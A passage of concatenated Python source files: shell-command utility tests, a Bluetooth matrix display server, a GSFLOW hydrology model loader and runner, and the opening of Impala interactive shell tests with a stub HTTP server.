with tempfile.TemporaryFile() as output_file:
action(stderr=output_file)
output_file.seek(0)
command_error_output = ustr(output_file.read(), encoding='utf-8', errors="backslashreplace")
self.assertEqual("TEST STRING\n", command_error_output, "stderr was not redirected to the output file correctly")
def test_run_command_should_write_the_command_error_output_to_the_stderr_parameter(self):
self.__it_should_write_the_command_error_output_to_the_stderr_parameter(
lambda stderr: shellutil.run_command(self.__create_tee_script(), input="TEST STRING\n", stderr=stderr))
def test_run_pipe_should_write_the_command_error_output_to_the_stderr_parameter(self):
self.__it_should_write_the_command_error_output_to_the_stderr_parameter(
lambda stderr: shellutil.run_pipe([["echo", "TEST STRING"], [self.__create_tee_script()]], stderr=stderr))
def test_run_pipe_should_capture_the_stderr_of_all_the_commands_in_the_pipe(self):
with self.assertRaises(shellutil.CommandError) as context_manager:
shellutil.run_pipe([
["echo", "TEST STRING"],
[self.__create_tee_script()],
[self.__create_tee_script()],
[self.__create_tee_script(return_code=1)]])
self.assertEqual("TEST STRING\n" * 3, context_manager.exception.stderr, "Expected 3 copies of the test string since there are 3 commands in the pipe")
def test_run_command_should_return_a_string_by_default(self):
output = shellutil.run_command(self.__create_tee_script(), input="TEST STRING")
self.assertTrue(isinstance(output, ustr), "The return value should be a string. Got: '{0}'".format(type(output)))
def test_run_pipe_should_return_a_string_by_default(self):
output = shellutil.run_pipe([["echo", "TEST STRING"], [self.__create_tee_script()]])
self.assertTrue(isinstance(output, ustr), "The return value should be a string. Got: '{0}'".format(type(output)))
def test_run_command_should_return_a_bytes_object_when_encode_output_is_false(self):
output = shellutil.run_command(self.__create_tee_script(), input="TEST STRING", encode_output=False)
self.assertTrue(isinstance(output, bytes), "The return value should be a bytes object. Got: '{0}'".format(type(output)))
def test_run_pipe_should_return_a_bytes_object_when_encode_output_is_false(self):
output = shellutil.run_pipe([["echo", "TEST STRING"], [self.__create_tee_script()]], encode_output=False)
self.assertTrue(isinstance(output, bytes), "The return value should be a bytes object. Got: '{0}'".format(type(output)))
# R0912: Too many branches (13/12) (too-many-branches) -- Disabled: Branches are sequential
def test_run_command_run_pipe_run_get_output_should_keep_track_of_the_running_commands(self): # pylint:disable=R0912
# The children processes run this script, which creates a file with the PIDs of the script and its parent and then sleeps for a long time
child_script = os.path.join(self.tmp_dir, "write_pids.py")
AgentTestCase.create_script(child_script, """
import os
import sys
import time
with open(sys.argv[1], "w") as pid_file:
pid_file.write("{0} {1}".format(os.getpid(), os.getppid()))
time.sleep(120)
""")
threads = []
try:
child_processes = []
parent_processes = []
try:
# each of these files will contain the PIDs of the command that created it and its parent
pid_files = [os.path.join(self.tmp_dir, "pids.txt.{0}".format(i)) for i in range(4)]
# we test these functions in shellutil
commands_to_execute = [
# run_get_output must be the first in this list; see the code to fetch the PIDs a few lines below
lambda: shellutil.run_get_output("{0} {1}".format(child_script, pid_files[0])),
lambda: shellutil.run_command([child_script, pid_files[1]]),
lambda: shellutil.run_pipe([[child_script, pid_files[2]], [child_script, pid_files[3]]]),
]
# start each command on a separate thread (since we need to examine the processes running the commands while they are running)
def invoke(command):
try:
command()
except shellutil.CommandError as command_error:
if command_error.returncode != -9: # test cleanup terminates the commands, so this is expected
raise
for cmd in commands_to_execute:
thread = threading.Thread(target=invoke, args=(cmd,))
thread.start()
threads.append(thread)
# now fetch the PIDs in the files created by the commands, but wait until they are created
if not self._wait_for(lambda: all(os.path.exists(file) and os.path.getsize(file) > 0 for file in pid_files)):
raise Exception("The child processes did not start within the allowed timeout")
for sig_file in pid_files:
with open(sig_file, "r") as read_handle:
pids = read_handle.read().split()
child_processes.append(int(pids[0]))
parent_processes.append(int(pids[1]))
# the first item to in the PIDs we fetched corresponds to run_get_output, which invokes the command using the
# shell, so in that case we need to use the parent's pid (i.e. the shell that we started)
started_commands = parent_processes[0:1] + child_processes[1:]
# wait for all the commands to start
running_commands = [[]]
def all_commands_running():
running_commands[0] = shellutil.get_running_commands()
return len(running_commands[0]) >= len(commands_to_execute) + 1 # +1 because run_pipe starts 2 commands
if not self._wait_for(all_commands_running):
self.fail("shellutil.get_running_commands() did not report the expected number of commands after the allowed timeout.\nExpected: {0}\nGot: {1}".format(
self._format_pids(started_commands), self._format_pids(running_commands[0])))
started_commands.sort()
running_commands[0].sort()
self.assertEqual(
started_commands,
running_commands[0],
"shellutil.get_running_commands() did not return the expected commands.\nExpected: {0}\nGot: {1}".format(
self._format_pids(started_commands), self._format_pids(running_commands[0])))
finally:
# terminate the child processes, since they are blocked
for pid in child_processes:
os.kill(pid, signal.SIGKILL)
# once the processes complete, their PIDs should go away
running_commands = [[]]
def all_commands_completed():
running_commands[0] = shellutil.get_running_commands()
return len(running_commands[0]) == 0
if not self._wait_for(all_commands_completed):
self.fail("shellutil.get_running_commands() should return empty after the commands complete. Got: {0}".format(
self._format_pids(running_commands[0])))
finally:
for thread in threads:
thread.join(timeout=5)
@staticmethod
def _format_pids(pids):
return ustr([RunCommandTestCase._get_command_line(pid) for pid in pids])
@staticmethod
def _get_command_line(pid):
try:
cmdline = '/proc/{0}/cmdline'.format(pid)
if os.path.exists(cmdline):
with open(cmdline, "r") as cmdline_file:
return "[PID: {0}] {1}".format(pid, cmdline_file.read())
except Exception:
pass
return "[PID: {0}] UNKNOWN".format(pid)
@staticmethod
def _wait_for(predicate):
start_time = datetime.datetime.now()
while RunCommandTestCase._to_seconds(datetime.datetime.now() - start_time) < 10:
if predicate():
return True
time.sleep(0.01)
return False
@staticmethod
def _to_seconds(time_delta):
return (time_delta.microseconds + (time_delta.seconds + time_delta.days * 24 * 3600) * 10**6) / 10**6
if __name__ == '__main__':
unittest.main()
|
matrix.py | from colours import BLUE, RED, GREEN, WHITE, BLACK, WHITE, YELLOW, Colour
from btcomm import BluetoothServer
from threading import Event
from threads import WrapThread
import json
from time import sleep
class BlueMatrix(object):
"""
"""
def __init__(self,
cols = 5,
rows = 3,
border = True,
visible = True,
colour = BLUE,
bt_device = "hci0",
bt_port = 2,
auto_start_server = True,
print_messages = True):
self._cols = 0
self._rows = 0
self._border = border
self._visible = visible
self._colour = colour
self._cells = {}
self._update_cells(cols, rows)
self._bt_device = bt_device
self._bt_port = 1
self._data_buffer = ""
self._print_messages = print_messages
self._is_connected_event = Event()
self._when_client_connects = None
self._when_client_disconnects = None
self._create_server()
if auto_start_server:
self.start()
# PROPERTIES
@property
def cells(self):
return [ c for c in self._cells.values() ]
@property
def cols(self):
return self._cols
@cols.setter
def cols(self, value):
self._update_cells(value, self._rows)
@property
def rows(self):
return self._rows
@rows.setter
def rows(self, value):
self._update_cells(self._cols, value)
@property
def colour(self):
return self._colour
@colour.setter
def colour(self, value):
if self._colour != value:
self._colour = value
# update all the cells
for cell in self.cells:
cell.colour = value
@property
def border(self):
return self._border
@border.setter
def border(self, value):
self._border = value
for cell in self.cells:
cell.border = value
@property
def visible(self):
return self._visible
@visible.setter
def visible(self, value):
self._visible = value
for cell in self.cells:
cell.visible = value
@property
def server(self):
"""
The :class:`.btcomm.BluetoothServer` instance that is being used to communicate
with clients.
"""
return self._server
@property
def running(self):
"""
Returns a ``True`` if the server is running.
"""
return self._server.running
@property
def print_messages(self):
"""
When set to ``True`` results in messages relating to the status of the Bluetooth server
to be printed.
"""
return self._print_messages
@print_messages.setter
def print_messages(self, value):
self._print_messages = value
@property
def when_client_connects(self):
"""
Sets or returns the function which is called when a Blue Dot connects.
"""
return self._when_client_connects
@when_client_connects.setter
def when_client_connects(self, value):
self._when_client_connects = value
@property
def when_client_disconnects(self):
"""
Sets or returns the function which is called when a Blue Dot disconnects.
"""
return self._when_client_disconnects
@when_client_disconnects.setter
def when_client_disconnects(self, value):
self._when_client_disconnects = value
# METHODS
def start(self):
"""
Start the :class:`.btcomm.BluetoothServer` if it is not already running. By default the server is started at
initialisation.
"""
self._server.start()
self._print_message("Server started {}".format(self.server.server_address))
self._print_message("Waiting for connection")
def stop(self):
"""
Stop the Bluetooth server.
"""
self._server.stop()
def cell(self, col, row):
try:
return self._cells[(col, row)]
except KeyError as e:
raise KeyError("Cell ({},{}) does not exist".format(col, row))
# INTERNAL METHODS
def _update_cells(self, cols, rows):
# create new cells
new_cells = {}
for c in range(cols):
for r in range(rows):
# if cell already exist, reuse it
if (c,r) in self._cells.keys():
new_cells[c,r] = self._cells[(c,r)]
else:
new_cells[c,r] = BlueMatrixCell(self, c, r, self._border, self._visible, self._colour)
self._cols = cols
self._rows = rows
self._cells = new_cells
def _create_server(self):
self._server = BluetoothServer(
self._data_received,
when_client_connects = self._client_connected,
when_client_disconnects = self._client_disconnected,
device = self._bt_device,
uuid = "5c464d54-bb29-4f1e-bcf8-caa0860fb48e",
port = self._bt_port,
power_up_device = True,
auto_start = False)
def _client_connected(self):
# send setup data to the client
self.set_matrix_and_cells()
self._is_connected_event.set()
self._print_message("Client connected {}".format(self.server.client_address))
if self.when_client_connects:
call_back_t = WrapThread(target=self.when_client_connects)
call_back_t.start()
def _client_disconnected(self):
self._is_connected_event.clear()
self._print_message("Client disconnected")
if self.when_client_disconnects:
call_back_t = WrapThread(target=self.when_client_disconnects)
call_back_t.start()
def _data_received(self, data):
#add the data received to the buffer
self._data_buffer += data
#get any full commands ended by \n
last_command = self._data_buffer.rfind("\n")
if last_command != -1:
commands = self._data_buffer[:last_command].split("\n")
#remove the processed commands from the buffer
self._data_buffer = self._data_buffer[last_command + 1:]
print("in = {}".format(commands))
#self._process_commands(commands)
def _print_message(self, message):
if self.print_messages:
print(message)
def set_matrix_and_cells(self):
"""
Sends the whole matrix configuration to the client.
Called when a new client connects.
"""
self.set_matrix()
for cell in self.cells:
if cell.modified:
self.set_cell(cell)
def set_matrix(self):
cmd = "1,{},{},{},{},{}\n"
cmd = cmd.format(
self.cols,
self.rows,
self.colour.str_argb,
"1" if self.border else "0",
"1" if self.visible else "0",
)
print(cmd)
self._server.send(cmd)
def set_cell(self, cell):
cmd = "2,{},{},{},{},{}\n"
cmd = cmd.format(
cell.col,
cell.row,
cell.colour.str_argb,
"1" if cell.border else "0",
"1" if cell.visible else "0",
)
print(cmd)
self._server.send(cmd)
def __str__(self):
return "cols = {}, rows = {}, border = {}, visible = {}, colour = {}".format(self._col, self._row, self._border, self._visible, self._colour)
class BlueMatrixCell(object):
def __init__(self, matrix, col, row, border, visible, colour):
self._matrix = matrix
self._col = col
self._row = row
self._border = border
self._visible = visible
self._colour = colour
#PROPERTIES
@property
def col(self):
return self._col
@property
def row(self):
return self._row
@property
def colour(self):
return self._colour
@colour.setter
def colour(self, value):
self._colour = value
@property
def border(self):
return self._border
@border.setter
def border(self, value):
self._border = value
@property
def visible(self):
return self._visible
@visible.setter
def visible(self, value):
self._visible = value
@property
def modified(self):
if self._border == self._matrix.border and self._colour == self._matrix.colour and self._visible == self._matrix.visible:
return False
else:
return True
def __str__(self):
return "({},{}), border = {}, visible = {}, colour = {}".format(self._col, self._row, self._border, self._visible, self._colour)
bm = BlueMatrix(cols = 10, rows = 10)
bm.colour = BLACK
bm.border = False
bm.cell(3,3).visible = False
bm.cell(9, 9).colour = RED
bm.cell(4, 4).border = False
bm.cell(9, 9).border = False
bm.cell(1,1).visible = False
bm.cell(4,3).visible = False
bm.cell(6, 7).colour = GREEN
bm.cell(0,1).visible = False
from signal import pause
pause() |
gsflow.py | # -*- coding: utf-8 -*-
import os, sys
import logging
from .control import Control
from .prms import Prms
from .supports import _get_file_abs
from .prms_help import Helper
import flopy
import subprocess as sp
if sys.version_info > (3, 0):
import queue as Queue
else:
import Queue
from datetime import datetime
import threading
def load(control_file):
gs = Gsflow(control_file=control_file)
gs.load()
return gs
class Gsflow():
def __init__(self, control_file=None, prms=None, mf=None, mf_load_only=None,
prms_load_only=None, gsflow_exe=None):
print ("PyGSFLOW ------ V0.0")
self.Help = Helper()
self.control_file = os.path.abspath(control_file)
self.ws = None
self.mf_load_only = mf_load_only
self.prms_load_only = prms_load_only
if gsflow_exe == None:
self.gsflow_exe = os.path.join(os.path.dirname(__file__), r"bin\gsflow.exe")
# initialize prms
if prms and isinstance(prms, Prms):
self.prms = prms
else:
self.prms = None
# todo: generate an msg
# inialize flopy
if mf and isinstance(mf, flopy.modflow.Modflow):
self.mf = mf
else:
self.mf = None
# todo: generate an error
self.load()
def load(self):
# load control file
if not (os.path.isfile(self.control_file)):
raise ValueError("Cannot find control file")
self.control = Control(control_file=self.control_file)
print("Control file is loaded")
# load prms
print("Working on loading PRMS model ...")
self.prms = Prms(control=self.control)
# load modflow
mode = self.control.get_values('model_mode')
if 'GSFLOW' in mode[0] or 'MODFLOW' in mode[0]:
print ("Working on loading MODFLOW files ....")
fname = self.control.get_values('modflow_name')
fname = _get_file_abs(control_file=self.control_file, fn=fname[0])
self._load_modflow(fname)
self.mf.namefile = os.path.basename(self.control.get_values('modflow_name')[0])
else:
print ("There are no Modflow files, PRMS model only")
def _load_modflow(self, fname):
"""
The package files in the .nam file are relative to the execuatble gsflow. So here, we generate a temp.nam
file that that has the absollute files
:return:
"""
fidr = open(fname, 'r')
content = fidr.readlines()
fidr.close()
temp_fn = os.path.basename(fname).split('.')[0] + "_gsflow_temp_.nam"
mf_dir = os.path.dirname(fname)
temp_fn = os.path.join(mf_dir, temp_fn)
fidw = open(temp_fn, 'w')
for line in content:
line = line.strip()
if line[0] == '#':
continue
parts = line.split()
pkg_nm = parts[0]
pkg_un = parts[1]
pkg_fn = parts[2]
pkg_fn = os.path.basename(pkg_fn)
# pkg_fn = os.path.join(mf_dir,pkg_fn)
txt = "{} {} {}\n".format(pkg_nm, pkg_un, pkg_fn)
fidw.write(txt)
fidw.close()
bas_nam = os.path.basename(temp_fn)
self.mf = flopy.modflow.Modflow.load(temp_fn, model_ws=mf_dir)
print ("MOSFLOW files are loaded ... ")
# def change_ws(self, ws):
#
# if os.path.isdir(ws):
# print("Warning: The {} directory already exists".format(ws))
# parent_folder = os.path.dirname(ws)
#
# if not (os.path.isdir(parent_folder)):
# raise ValueError(" The parent directory {} doesn't exist...".format(parent_folder))
#
# if not (os.path.isdir(ws)):
# os.mkdir(ws)
#
# self.ws = ws
#
# # change control file location
# fnn = os.path.basename(self.control.control_file)
# self.control.control_file = os.path.join(self.ws, fnn)
#
# # change parameters
# for par_record in self.prms.Parameters.parameters_list:
# curr_file = os.path.basename(par_record.file_name)
# curr_file = os.path.join(self.ws, curr_file)
# par_record.file_name = curr_file
#
# # change datafile
# curr_file = os.path.basename(self.prms.Data.data_file)
# curr_file = os.path.join(self.ws, curr_file)
# self.prms.Data.data_file = curr_file
#
# # change mf
# if not (self.mf == None):
# self.mf.change_model_ws(self.ws)
# def change_base_file_name(self, filename):
# # change control file location
# cnt_file = filename + "_cnt" + ".control"
# dir__ = os.path.dirname(self.control.control_file)
# self.control.control_file = os.path.join(dir__, cnt_file)
#
# # change parameters
# for index, par_record in enumerate(self.prms.Parameters.parameters_list):
# curr_file = os.path.basename(par_record.file_name)
# curr_file = os.path.join(self.ws, curr_file)
# par_record.file_name = curr_file
#
# # change datafile
# curr_file = os.path.basename(self.prms.Data.data_file)
# curr_file = os.path.join(self.ws, curr_file)
# self.prms.Data.data_file = curr_file
# pass
def _get_relative_path(self, fn):
"""
If relative files are used, they should be relative to the control file
:return: relative path with respect to control file
"""
control_file_abs = os.path.absfile(self.control)
fn_abs = os.path.absfile(fn)
# find common path
rel_dir = os.path.relpath(os.path.dirname(fn), os.path.dirname(control_file_abs))
rel_path = os.path.join(rel_dir + os.path.basename(fn))
return rel_path
# def _mk_dir(self, dir_):
# if not (os.path.isdir(dir_)):
# os.mkdir(dir_)
# else:
# print(" Warning: the directory exists {}".format(dir_))
def write_input(self, basename=None, workspace=None):
"""
:param basename:
:param workspace:
:return:
Write input files for gsflow. Four cases are possible:
(1) if basename and workspace are None,then the exisiting files will be overwritten
(2) if basename is specified, only file names will be changes
(3) if only workspace is specified, only folder will be changed
(4) when both basename and workspace are specifed both files are changed
"""
# overwrite
print("Writing the project files .....")
if not (workspace == None):
workspace = os.path.abspath(workspace)
if basename == None and workspace == None:
print("Warning: input files will be overwritten....")
self._write_all()
return
# only change the directory
if (basename == None) and (not (workspace == None)):
if not (os.path.isdir(workspace)):
os.mkdir(workspace)
fnn = os.path.basename(self.control.control_file)
self.control.control_file = os.path.join(workspace, fnn)
self.control_file = os.path.join(workspace, fnn)
self.prms.control_file = self.control_file
# change parameters
new_param_file_list = []
for par_record in self.prms.parameters.parameters_list:
curr_file = os.path.basename(par_record.file_name)
curr_file = os.path.join(workspace, curr_file)
par_record.file_name = curr_file
if not (curr_file in new_param_file_list):
new_param_file_list.append(curr_file)
self.control.set_values('param_file', new_param_file_list)
# change datafile
curr_file = os.path.basename(self.prms.Data.data_file[0])
curr_file = os.path.join(workspace, curr_file)
self.prms.Data.data_file = curr_file
self.control.set_values('data_file', [curr_file])
# change mf
if not (self.mf == None):
self.mf.change_model_ws(workspace)
nmfile = os.path.basename(self.mf.name)
self.mf.name = os.path.join(self.mf.model_ws, nmfile)
out_files_list = []
for out_file in self.mf.output_fnames:
ext = out_file.split(".")[-1]
if out_file.count('.') > 1:
ext = out_file.split(".")
del ext[0]
ext = ".".join(ext)
#new_outfn = os.path.join(workspace, basename + "." + ext)
new_outfn = nmfile + "." + ext
out_files_list.append(new_outfn)
self.mf.output_fnames = out_files_list
mfnm = self.mf.name + ".nam"
self.control.set_values('modflow_name', [mfnm])
# update file names in control object
for rec_name in self.control._gslow_files:
if rec_name in self.control._record_names:
file_values = self.control.get_values(rec_name)
file_value = []
for fil in file_values:
cnt_dir = os.path.dirname(self.control_file)
va = os.path.join(workspace, os.path.basename(fil))
file_value.append(va)
self.control.set_values(rec_name, file_value)
# write
self.prms.control = self.control
self._write_all()
return
# only change the basename
if (not (basename == None)) and (workspace == None):
cnt_file = basename + "_cont.control"
ws_ = os.path.dirname(self.control.control_file)
self.control.control_file = os.path.join(ws_, cnt_file)
self.control_file = os.path.join(ws_, cnt_file)
self.prms.control_file = self.control_file
# change parameters
flist = self.prms.parameters.parameter_files
new_param_file_list = []
for ifile, par_record in enumerate(self.prms.parameters.parameters_list):
file_index = flist.index(par_record.file_name)
par_file = basename + "_par_{}.params".format(file_index)
curr_dir = os.path.dirname(par_record.file_name)
curr_file = os.path.join(curr_dir, par_file)
par_record.file_name = curr_file
if not (curr_file in new_param_file_list):
new_param_file_list.append(curr_file)
self.control.set_values('param_file', new_param_file_list)
# change datafile
dfile = basename + "_dat.data"
curr_dir = os.path.dirname(self.prms.Data.data_file)
curr_file = os.path.join(curr_dir, dfile)
self.prms.Data.data_file = curr_file
self.control.set_values('data_file', [curr_file])
# change mf
if not (self.mf == None):
curr_dir = self.mf.model_ws
#self.mf.name = os.path.join(curr_dir, basename)
self.mf.name = os.path.join(curr_dir, basename)
out_files_list = []
for out_file in self.mf.output_fnames:
ext = out_file.split(".")[-1]
if out_file.count('.') > 1:
ext = out_file.split(".")
del ext[0]
ext = ".".join(ext)
#new_outfn = os.path.join(workspace, basename + "." + ext)
new_outfn = basename + "." + ext
out_files_list.append(new_outfn)
self.mf.output_fnames = out_files_list
mfnm = self.mf.name + ".nam"
self.control.set_values('modflow_name',[mfnm])
# update file names in control object
for rec_name in self.control._gslow_files:
if rec_name in self.control._record_names:
if rec_name in ['modflow_name', 'param_file', 'data_file']:
continue
file_values = self.control.get_values(rec_name)
file_value = []
for fil in file_values:
dir_name = os.path.dirname(fil)
if rec_name == 'modflow_name':
mfname = basename + ".nam"
filvalue = os.path.join(dir_name, mfname)
else:
vvfile = rec_name.split("_")
del vvfile[-1]
vvfile = "_".join(vvfile)
if "." in fil:
ext = fil.split(".")[-1]
else:
ext = "dat"
#ext = fil.split(".")[-1]
vvfile = basename + "_" + vvfile + "." + ext
filvalue = os.path.join(dir_name, vvfile)
file_value.append(filvalue)
self.control.set_values(rec_name, file_value)
self.prms.control = self.control
self._write_all()
return
# change both directory & basename
if (not (basename == None)) and (not (workspace == None)):
if not (os.path.isdir(workspace)):
os.mkdir(workspace)
cnt_file = basename + "_cont.control"
self.control.control_file = os.path.join(workspace, cnt_file)
self.prms.control_file = self.control.control_file
self.control_file = self.control.control_file
# change parameters
## get param files list
flist = self.prms.parameters.parameter_files
new_param_file_list = []
for ifile, par_record in enumerate(self.prms.parameters.parameters_list):
file_index = flist.index(par_record.file_name)
par_file = basename + "_par_{}.params".format(file_index)
curr_file = os.path.join(workspace, par_file)
par_record.file_name = curr_file
if not (curr_file in new_param_file_list):
new_param_file_list.append(curr_file)
self.control.set_values('param_file', new_param_file_list)
# change datafile
dfile = basename + "_dat.data"
curr_file = os.path.join(workspace, dfile)
self.prms.Data.data_file = curr_file
self.control.set_values('data_file', [curr_file])
# change mf
if not (self.mf == None):
self.mf.change_model_ws(workspace)
self.mf.name = os.path.join(workspace, basename)
out_files_list = []
for out_file in self.mf.output_fnames:
ext = out_file.split(".")[-1]
if out_file.count('.') > 1:
ext = out_file.split(".")
del ext[0]
ext = ".".join(ext)
#new_outfn = os.path.join(workspace, basename + "." + ext)
new_outfn = basename + "." + ext
out_files_list.append(new_outfn)
self.mf.output_fnames = out_files_list
mfnm = basename + ".nam"
self.control.set_values('modflow_name', [os.path.join(workspace, mfnm)])
## TODO: Update control file
# update file names in control object
for rec_name in self.control._gslow_files:
if rec_name in self.control._record_names:
if rec_name in ['modflow_name', 'param_file', 'data_file']:
continue
file_values = self.control.get_values(rec_name)
file_value = []
for fil in file_values:
dir_name = os.path.dirname(fil)
if rec_name == 'modflow_name':
mfname = basename + ".nam"
filvalue = os.path.join(dir_name, mfname)
elif rec_name == 'param_file':
continue
elif rec_name == 'data_file':
continue
else:
vvfile = rec_name.split("_")
del vvfile[-1]
vvfile = "_".join(vvfile)
if "." in fil:
ext = fil.split(".")[-1]
else:
ext = "dat"
vvfile = basename + "_" + vvfile + "." + ext
filvalue = os.path.join(workspace, vvfile)
file_value.append(filvalue)
self.control.set_values(rec_name, file_value)
self.prms.control = self.control
self._write_all()
return
def _write_all(self):
# write control
print("Control file is written...")
self.control.write()
# self write parameters
print("Parameters files are written...")
self.prms.parameters.write()
# write data
print("Data file is written...")
self.prms.Data.write()
# write mf
print("Modflow files are written...")
if not (self.mf == None):
self.mf.write_input()
def run_model(self):
fn = self.control_file
cnt_folder = os.path.dirname(fn)
fnm = os.path.abspath(fn)
if not os.path.isfile(self.gsflow_exe):
print ("Warning : The executable of the model is not specified. Use .gsflow_exe "
"to define its path... ")
return None
self.__run(exe_name=self.gsflow_exe, namefile=fn)
def _generate_batch_file(self):
fn = os.path.dirname(self.control_file)
fn = os.path.join(fn, "__run_gsflow.bat")
self.__bat_file = fn
fidw = open(fn, 'w')
cmd = self.gsflow_exe + " " + self.control_file
fidw.write(cmd)
fidw.close()
def __run(self, exe_name, namefile, model_ws='./',
silent=False, pause=False, report=False,
normal_msg='normal termination',
async=False, cargs=None):
"""
This function will run the model using subprocess.Popen. It
communicates with the model's stdout asynchronously and reports
progress to the screen with timestamps
Parameters
----------
exe_name : str
Executable name (with path, if necessary) to run.
namefile : str
Namefile of model to run. The namefile must be the
filename of the namefile without the path.
model_ws : str
Path to the location of the namefile. (default is the
current working directory - './')
silent : boolean
Echo run information to screen (default is True).
pause : boolean, optional
Pause upon completion (default is False).
report : boolean, optional
Save stdout lines to a list (buff) which is returned
by the method . (default is False).
normal_msg : str
Normal termination message used to determine if the
run terminated normally. (default is 'normal termination')
async : boolean
asynchonously read model stdout and report with timestamps. good for
models that take long time to run. not good for models that run
really fast
cargs : str or list of strings
additional command line arguments to pass to the executable.
Default is None
Returns
-------
(success, buff)
success : boolean
buff : list of lines of stdout
"""
def is_exe(fpath):
return os.path.isfile(fpath) and os.access(fpath, os.X_OK)
def which(program):
fpath, fname = os.path.split(program)
if fpath:
if is_exe(program):
return program
else:
# test for exe in current working directory
if is_exe(program):
return program
# test for exe in path statement
for path in os.environ["PATH"].split(os.pathsep):
path = path.strip('"')
exe_file = os.path.join(path, program)
if is_exe(exe_file):
return exe_file
return None
success = False
buff = []
# convert normal_msg to lower case for comparison
if isinstance(normal_msg, str):
normal_msg = [normal_msg.lower()]
elif isinstance(normal_msg, list):
for idx, s in enumerate(normal_msg):
normal_msg[idx] = s.lower()
# Check to make sure that program and namefile exist
exe = which(exe_name)
if exe is None:
import platform
if platform.system() in 'Windows':
if not exe_name.lower().endswith('.exe'):
exe = which(exe_name + '.exe')
if exe is None:
s = 'The program {} does not exist or is not executable.'.format(
exe_name)
raise Exception(s)
else:
if not silent:
s = 'pyGSFLOW is using the following executable to run the model: {}'.format(
exe)
print(s)
if not os.path.isfile(os.path.join(model_ws, namefile)):
s = 'The namefile for this model does not exists: {}'.format(namefile)
raise Exception(s)
# simple little function for the thread to target
def q_output(output, q):
for line in iter(output.readline, b''):
q.put(line)
# time.sleep(1)
# output.close()
# create a list of arguments to pass to Popen
argv = [exe_name, namefile]
# add additional arguments to Popen arguments
if cargs is not None:
if isinstance(cargs, str):
cargs = [cargs]
for t in cargs:
argv.append(t)
# run the model with Popen
self._generate_batch_file()
argv = self.__bat_file
model_ws = os.path.dirname(self.control_file)
proc = sp.Popen(argv,
stdout=sp.PIPE, stderr=sp.STDOUT, cwd=model_ws)
if not async:
while True:
line = proc.stdout.readline()
c = line.decode('utf-8')
if c != '':
for msg in normal_msg:
if msg in c.lower():
success = True
break
c = c.rstrip('\r\n')
if not silent:
print('{}'.format(c))
if report == True:
buff.append(c)
else:
break
return success, buff
# some tricks for the async stdout reading
q = Queue.Queue()
thread = threading.Thread(target=q_output, args=(proc.stdout, q))
thread.daemon = True
thread.start()
failed_words = ["fail", "error"]
last = datetime.now()
lastsec = 0.
while True:
try:
line = q.get_nowait()
except Queue.Empty:
pass
else:
if line == '':
break
line = line.decode().lower().strip()
if line != '':
now = datetime.now()
dt = now - last
tsecs = dt.total_seconds() - lastsec
line = "(elapsed:{0})-->{1}".format(tsecs, line)
lastsec = tsecs + lastsec
buff.append(line)
if not silent:
print(line)
for fword in failed_words:
if fword in line:
success = False
break
if proc.poll() is not None:
break
proc.wait()
thread.join(timeout=1)
buff.extend(proc.stdout.readlines())
proc.stdout.close()
for line in buff:
if normal_msg in line:
print("success")
success = True
break
if pause:
input('Press Enter to continue...')
return success, buff
|
test_shell_interactive.py | #!/usr/bin/env impala-python
# -*- coding: utf-8 -*-
#
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
import httplib
import logging
import os
import pexpect
import pytest
import re
import signal
import socket
import sys
import threading
from time import sleep
# This import is the actual ImpalaShell class from impala_shell.py.
# We rename it to ImpalaShellClass here because we later import another
# class called ImpalaShell from tests/shell/util.py, and we don't want
# to mask it.
from shell.impala_shell import ImpalaShell as ImpalaShellClass
from tempfile import NamedTemporaryFile
from tests.common.impala_service import ImpaladService
from tests.common.impala_test_suite import ImpalaTestSuite
from tests.common.skip import SkipIfLocal
from tests.common.test_dimensions import create_client_protocol_dimension
from tests.shell.util import get_unused_port
from util import (assert_var_substitution, ImpalaShell, get_impalad_port, get_shell_cmd,
get_open_sessions_metric, IMPALA_SHELL_EXECUTABLE, spawn_shell)
import SimpleHTTPServer
import SocketServer
QUERY_FILE_PATH = os.path.join(os.environ['IMPALA_HOME'], 'tests', 'shell')
# Regex to match the interactive shell prompt that is expected after each command.
# Examples: hostname:21000, hostname:21050, hostname:28000
PROMPT_REGEX = r'\[[^:]+:2(1|8)0[0-9][0-9]\]'
LOG = logging.getLogger('test_shell_interactive')
@pytest.fixture
def tmp_history_file(request):
"""
Test fixture which uses a temporary file as the path for the shell
history.
"""
tmp = NamedTemporaryFile()
old_path = os.environ.get('IMPALA_HISTFILE')
os.environ['IMPALA_HISTFILE'] = tmp.name
def cleanup():
if old_path is not None:
os.environ['IMPALA_HISTFILE'] = old_path
else:
del os.environ['IMPALA_HISTFILE']
request.addfinalizer(cleanup)
return tmp.name
class RequestHandler503(SimpleHTTPServer.SimpleHTTPRequestHandler):
"""A custom http handler that checks for duplicate 'Host' headers from the most
recent http request, and always returns a 503 http code."""
def __init__(self, request, client_address, server):
SimpleHTTPServer.SimpleHTTPRequestHandler.__init__(self, request, client_address,
server)
def should_send_body_text(self):
# in RequestHandler503 we do not send any body text
return False
def do_POST(self):
# The unfortunately named self.headers here is an instance of mimetools.Message that
# contains the request headers.
request_headers = self.headers.headers
# Ensure that only one 'Host' header is contained in the request before responding.
host_hdr_count = sum([header.startswith('Host:') for header in request_headers])
assert host_hdr_count == 1, "duplicate 'Host:' headers in %s" % request_headers
# Respond with 503.
self.send_response(code=httplib.SERVICE_UNAVAILABLE, message="Service Unavailable")
if self.should_send_body_text():
# Optionally send ody text with 503 message.
self.end_headers()
self.wfile.write("EXTRA")
class RequestHandler503Extra(RequestHandler503):
""""Override RequestHandler503 so as to send body text with the 503 message."""
def __init__(self, request, client_address, server):
RequestHandler503.__init__(self, request, client_address, server)
def should_send_body_text(self):
# in RequestHandler503Extra we will send body text
return True
class TestHTTPServer503(object):
def __init__(self, clazz):
self.HOST = "localhost"
self.PORT = get_unused_port()
self.httpd = SocketServer.TCPServer((self.HOST, self.PORT), clazz)
self.http_server_thread = threading.Thread(target=self.httpd.serve_forever)
self.http_server_thread.start()
def shutdown_server(server):
"""Helper method to shutdown a http server."""
if server.httpd is not None:
server.httpd.shutdown()
if server.http_server_thread is not None:
